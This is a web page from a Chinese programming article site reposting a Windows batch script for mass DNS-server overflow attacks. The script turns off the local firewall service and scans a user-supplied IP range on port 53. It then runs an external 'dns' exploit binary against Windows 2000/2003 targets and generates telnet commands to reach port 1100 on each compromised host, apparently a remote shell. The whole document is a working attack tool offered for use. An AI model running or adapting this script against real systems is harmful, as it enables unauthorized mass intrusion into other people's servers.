欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

DNS批量溢出批处理代码

程序员文章站 2022-06-16 15:38:01
复制代码 代码如下:@shift 1  @ setlocal  @ cls  @ color ...

复制代码 代码如下:

@shift 1 
@ setlocal 
@ cls 
@ color a 
@ title dns批量溢出个人版 
@echo ================================================================================ 
@echo dns批量溢出个人版 
@echo by amxking 
@echo 1.输入您想溢出的ip段 格式:xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx  
@echo================================================================================= 
@ set /p input=1.输入您想溢出的ip段: 
@ echo %input%>>ip.txt 
@ net stop sharedaccess 
@ net start server 
@echo ================================================================================ 
@set /p c=请选择扫描方式: (1为tcp,2为syn): 
@if "%c%"=="2" goto syn 
@if "%c%"=="1" goto tcp 

:syn 
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %myfiles%\s syn %%i %%j 53 /save 
@ goto ip 

:tcp 
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %myfiles%\s tcp %%i %%j 53 1000 /save 

@ goto ip 

:ip 
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt 
@for /f "eol=p tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt 
@for /f "eol=s tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt 

@del ip.txt 
@del s1.txt 
@del s2.txt 
@del result.txt 
@echo================================================================================= 
@echo 等待溢出…………当出现类似203.80.19.6 1077 :vulnerability os:window 2003 
@echo 为可以溢出的ip 203.80.19.6 为ip 1077为端口 2003 为系统类型 
@echo 请把能溢出的保存为boot.txt 保存格式:ip 端口 系统 例如 58.34.125.200 1029 2003 
@echo================================================================================= 
@ for /f "eol= tokens=1 delims= " %%i in (s.txt) do %myfiles%\dns -s %%i >>a.txt 
@echo================================================================================= 
@echo 请把能溢出的保存为boot.txt 保存格式:ip 端口 系统 例如 58.34.125.200 1029 2003 
@echo================================================================================= 
@pause 

@ for /f "eol= tokens=1,2 delims= " %%i in (boot.txt) do %myfiles%\dns -t2000all %%i %%j 

@for /f "eol= tokens=1,2 delims= " %%i in (boot.txt) do %myfiles%\dns -t2003eng %%i %%j 
@goto yichu 
:yichu 
@for /f "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt 
@for /f "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat 
@del s.txt 
@del a.txt 
@del 3.txt 

@echo================================================================================= 
@echo 运行生成的批处理 等待溢出………… 
@echo================================================================================= 
@pause